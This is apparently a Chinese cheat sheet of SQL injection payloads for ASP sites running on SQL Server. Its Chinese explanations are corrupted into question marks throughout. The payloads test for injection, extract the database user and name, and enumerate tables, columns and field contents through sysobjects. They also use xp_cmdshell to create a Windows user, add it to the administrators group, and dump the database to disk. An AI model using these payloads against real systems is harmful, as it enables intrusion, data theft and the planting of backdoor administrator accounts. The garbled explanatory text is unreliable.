ASP+SQL Server SQL ?????????????

???????????? ???????[ 2013/12/6 13:50:19 ] ????????

SQL?????????????	???
Night-- Night’ and 1=1-- Night’ and 1=2--	?ж???????????????SQL Server?е??????????”--”
URL;and user>0--	User ??SQL Server????????????????????????????????????????????nvarchar????????????????????????????????nvarchar????nvarchar??????int????????????????SQL Server???????????????????????user???????nvarchar?“XXX”????????????int???????????????
URL;and db_name()>0--	????????????
URL;and (select count(*) from sysobjects)>0—	msysobjects??Access ???????????sysobjects??SQL Server???????????????ι????????????????????????б??????????????????????.
URL;and (select count(*) from msysobjects)>0--
Night’ and (select count(*) from sysobjects where Xtype=’u’ and status>0)=??????--	????????????ж?????????????????sysobjects?д??????????????б??????????????????xtype=’U’ and status>0 ????????????????????
Night’ and (select top 1 name from sysobjects where Xtype=’U’ and status>0 )>0--	??????????????
Night’ and (select top 1 name from sysobjects where Xtype=’U’ and status>0 and name!=’?????????’)>0--	????????????????????????
Night’ and (Select Top lcol_name(object_id(‘????’)??1) from sysobjects)>0--	???sysobjects???????
Night’ and (select top 1 len(????) from ????)>0--	???????????
Night’ and (select top 1 asc(mid(??????1??1)) from ????)>0--	??????????????????????????????б?????????
URL;exec master..xp_cmdshell “net user ???????????” /add	????洢????xp_cmdshell???????????????????
URL;exec master..xp_cmdshell “net localgroup administrators ????? /add”--	???????????????????
URL;backup database ??????? to disk=’·??’;--	????洢????????????????????HTTP??????????￡????????????????????????